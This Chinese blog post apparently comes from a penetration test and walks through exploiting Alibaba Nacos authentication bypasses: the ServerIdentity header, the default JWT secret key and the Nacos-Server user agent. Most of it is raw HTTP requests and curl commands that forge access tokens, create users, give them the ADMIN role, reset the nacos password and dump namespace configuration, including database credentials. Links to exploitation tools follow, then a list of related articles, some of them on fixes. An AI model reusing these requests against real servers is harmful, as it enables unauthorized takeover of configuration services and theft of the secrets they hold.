nacos认证绕过加用户登录后台读取配置信息

已于 2024-07-31 18:36:48 修改
阅读量1.4k 收藏 8
点赞数 5
文章标签: web安全
于 2024-02-29 08:10:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35013491/article/details/136360716
版权

一次检查过程中,发现nacos,不能太信任综合漏洞利用工具。

1.    Nacos 未授权访问后台

2.    Nacos ServerIdentity 权限绕过

3.    Nacos 默认key权限绕过

这个三个比较常利用,语句在最下面。

遇到一个,Nacos ServerIdentity 权限绕过的,加了用户,加用户组,再加入权限,结果发现配置文件还是无法查看。

突破方法:

如果是默认key权限绕过的话,包里面就带上accessToken值不带Serveridentity: security,去加用户,加组,加权限。

如果是ServerIdentity权限绕过,包就别带accessToken值只带Serveridentity: security去加用户,加组,加权限。

如果加上去了还是读不了配置文件的话,先加用户,登录nacos把空间名记录出来,

burp把下面的包改一下空间名,就把一个空间所有配置文件读出来,省得一个个翻。

总结:是什么漏洞加的用户,登录用户进去空间看不了,那么就抓漏洞加用户的包,去加管理员组,加只读权限就ok。加用户进去主要目标是为了抓包。

 如果登录进去只能读pulic空间的内容,那么就抓pulic空间名的包,再去抓其他空间名的名称 替换pulic的空间名查看内容,看不了的话  只要有包,利用漏洞查看就可以。

nacos漏洞利用工具1:

GitHub - charonlight/NacosExploitGUI: Nacos漏洞综合利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用

nacos漏洞利用工具2: 漏洞多点

GitHub - HKEcho5213/HKEcho_Nacos

GET /nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=空间名&search=blur&accessToken= HTTP/1.1
Host: 10.48.18.215:82
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Referer: http://10.48.18.215:82/nacos/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Serveridentity: security
Connection: close

1. 加用户
POST /nacos/v1/auth/users?&accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q HTTP/1.1
Host: 172.16.38.96:8848
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

username=jiancha03&password=test03!@#$

2. 加用户组
POST /nacos/v1/auth/roles?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q HTTP/1.1
Host: 172.16.38.96:8848
Content-Length: 29
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://172.16.38.96:8848
Referer: http://172.16.38.96:8848/nacos/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

role=ADMIN&username=jiancha03

3. 加只读权限
/nacos/v1/auth/permissions?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q  HTTP/1.1
Host: 172.16.38.96:8848
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=BD50FD476590604C1BAA6D255564F007
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

role=ADMIN&resource=%3A%2A%3A%2A&action=r

其他一些可能或者重复用得上的nacos post包

1.  nacos  加用户:

POST /nacos/v1/auth/users HTTP/1.1
Host: xxxxxx.com
User-Agent: Nacos-Server
Accept-Encoding: gzip, deflateConnection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

username=test&password=test


GET /nacos/v1/auth/users?pageNo=1&pageSize=1 HTTP/1.1
Host: xxxxxx.com
User-Agent: Nacos-Server
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflateConnection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0




2. 查看用户
http://xxxxxx.com/nacos/v1/auth/users?pageNo=1&pageSize=999





漏洞5:nacos默认key权限绕过
Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞 Alibaba Nacos <= 2.2.0
http://172.17.254.75:8848/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9

POST /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ HTTP/1.1
Host: 172.17.254.75:8848
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

username=jianchesafe2&password=jianchesafe.asdd



漏洞6:Nacos ServerIdentity 权限绕过
Nacos 平台在 Header 中添加 serverIdentity: security 能直接绕过身份验证查看用户列表
GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=  HTTP/1.1
Host: 172.17.254.75:8848
Serveridentity: security
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

POST /nacos/v1/auth/users HTTP/1.1
Host: 172.17.254.75:8848
Serveridentity: security
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

username=jianchesafe&password=jianchesafe.asdd




GET /nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=namespace-zkky-xt&search=accurate&message=true&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&username=jianchesafe2 HTTP/1.1
Host: 172.17.254.75:8848
Accept: application/json, text/plain, */*
accessToken: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJqaWFuY2hlc2FmZTIiLCJleHAiOjE2OTQxNzMyNDB9.rTS4TSD87cAkwK5sX1lj-iaqXGdBVfT9Up6hR48a4nM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Referer: http://172.17.254.75:8848/nacos/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=B4BCFB415B653B5CC5647F40F8C8D102
Connection: close


越权查看数据库配置:
GET /nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=namespace-zkky-xt&search=accurate&message=true&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&username=jianchesafe2 HTTP/1.1
Host: 172.17.254.75:8848
Accept: application/json, text/plain, */*
accessToken: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJqaWFuY2hlc2FmZTIiLCJleHAiOjE2OTQxNzMyNDB9.rTS4TSD87cAkwK5sX1lj-iaqXGdBVfT9Up6hR48a4nM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Referer: http://172.17.254.75:8848/nacos/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=B4BCFB415B653B5CC5647F40F8C8D102
Connection: close

泄露数据库配置信息



在jwt.io在线网站中,输入默认key:SecretKey012345678901234567890123456789012345678901234567890123456789,然后修改payload的值。exp参数的值是unix时间戳,这个时间戳代表着accessToken的过期时间,所以要将时间戳往后面设。


利用一:修改nacos用户密码,将密码修改为123456
curl -X PUT "http://192.168.80.131:8848/nacos/v1/auth/users?username=nacos&newPassword=123456&pageNo=1&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5MzA1OTQyMX0.rh3mpIO1GQ8liXkza9ZRoi2u21S1uhKVFioxAwkIrFk"



利用二:新建test用户
curl "http://192.168.80.131:8848/nacos/v1/auth/users"  -X POST -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5MzA1OTQyMX0.rh3mpIO1GQ8liXkza9ZRoi2u21S1uhKVFioxAwkIrFk" -d "username=test1&password=test

低调求绕过,没事写博客
关注
2020最新面试题(含答案)
余生一个帆的博客
04-20 1万+
1.sql中有select,from,where,group by,order by,having请问sql执行时的顺序是怎样的? 答:前面从from(表)where(按条件取出数据)group by(再对取出的数据分组)having(分组后再过滤得到最新数据集)select(按照设置列从数据集里面去除数据)order by(对取出的数据进行排序) 执行顺序:from–where–group by...
Nacos2.2.2增鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。 服务(Service)是 Nacos 世界的一等公民。Nacos 支持几乎所有主流类型的“服务”的发现、配置和管理: Kubernetes Service gRPC & Dubbo RPC Service Spring Cloud RESTful Service Nacos 的关键特性包括: 服务发现和服务健康监测 Nacos 支持基于 DNS 和基于 RPC 的服务发现。服务提供者使用 原生SDK、OpenAPI、或一个独立的Agent TODO注册 Service
Nacos 存在认证绕过漏洞(CVE-2021-29441)
北方的孤夜
06-04 1914
Nacos 存在认证绕过漏洞(CVE-2021-29441)
Nacos漏洞总结复现_nacos默认jwt密钥导致未授权访问
最新发布
yy1715713348的博客
08-12 964
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户
Nacos身份认证权限绕过+漏洞利用工具分享
hackzkaq的博客
12-27 2892
JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。 在线解密查看内容:
nacos权限认证绕过问题
qq_44104879的博客
06-19 1352
记录一次项目上nacos权限认证绕过漏洞
NACOS身份认证绕过
weixin_51345872的博客
09-27 2839
仅供学习参考使用,任何违法事情与本人无关
Nacos身份认证绕过漏洞(QVD-2023-6271)
热门推荐
qq_50854662的博客
03-20 1万+
漏洞原理为开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。
SpringBoot 接口数据解密
人生起落,生活苦甜,坚持追求!
10-20 2146
xx项目有于安全问题,需要对接口整体进行密处理,我们怎么处理呢。和产品、前端讨论需求后,梳理了相关技术方案,主要的需求点如下:尽量少改动,不影响之前的业务逻辑;考虑到时间紧迫性,可采用对称性密方式,服务需要对接安卓、IOS、H5三端,另外考虑到H5端存储密钥安全性相对来说会低一些,故分针对H5和安卓、IOS分配两套密钥;要兼容低版本的接口,后面新开发的接口可不用兼容;接口有GET和POST两种接口,需要都要进行解密;
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1915
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
NACOS身份认证绕过漏洞批量检测poc.7z
面试题
weixin_46597615的博客
06-12 432
面试题
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1239
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
nacos权限绕过漏洞(nacos认证绕过安全漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 3449
可以看出在 1.2~1.4.0 的版本期间是存在认证绕过安全漏洞的,是因为 User-Agent 中包含了 Nacos-Server 使得认定请求来自于其他服务端,从而绕过认证nacos权限绕过漏洞环境搭建 我们选择版本nacos 1.4.0来对漏洞进行复现 下载安装包后 运行startup.cmd -m standalone 需要在环境变量中设置 JAVA_HOME ,设置完环境变量后重新打开一个命令行 否则并不生效 ,启动的时候最好用管理员权限启动,否则会出现启动不成功的问题
漏洞复现 - - - Alibaba Nacos权限认证绕过
weixin_67503304的博客
08-03 5062
Alibaba Nacos权限认证绕过Max HackBar方式进行POST传参,简单易懂,操作方便。
Nacos权限认证绕过
m0_51750962的博客
09-22 337
nacos未授权登录
【备忘录】修复docker环境下的nacos安全漏洞:身份认证绕过漏洞
Xcong_Zhu的博客
10-23 2448
nacos2.2.0.1和1.4.5版本之前的版本中,可能是为了便于开发环境使用,默认开启了一个自带的token默认值,导致上述报告中,可以利用默认的访问秘钥跳过认证,直接登陆。1、检查application.properties文件中token.secret.key属性,若为默认值,可参考:https://nacos.io/zh-cn/docs/v2/guide/user/auth.html进行更改。之后讲登录返回包修改为正确登录信息。点击发送发现正确登录返回信息。同时选中base64密。
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 5659
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
nacos绕过认证获取信息漏洞
06-03
Nacos 1.3.0 ~ 1.3.2 版本中存在一个认证绕过漏洞(CVE-2020-9499),攻击者可以通过构造恶意请求,绕过Nacos的身份认证机制,获取敏感信息。该漏洞的具体触发方式如下: 1. 攻击者构造一个HTTP请求,请求中包含了未经过认证的token信息(可以是恶意token或者是其他用户的token)。 2. Nacos服务器接收到请求后,对token进行验证。由于存在漏洞,Nacos服务器无法正确地验证token的合法性,进而绕过了身份认证机制。 3. 攻击者可以在未经过身份认证的情况下,获取敏感信息,如用户名、密码、密钥等。 为避免该漏洞的风险,建议用户升级Nacos到最新版本,并安全措施,包括强密码管理、限制访问权限等。同时,也应该定期关注Nacos安全公告,了解最新漏洞信息
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值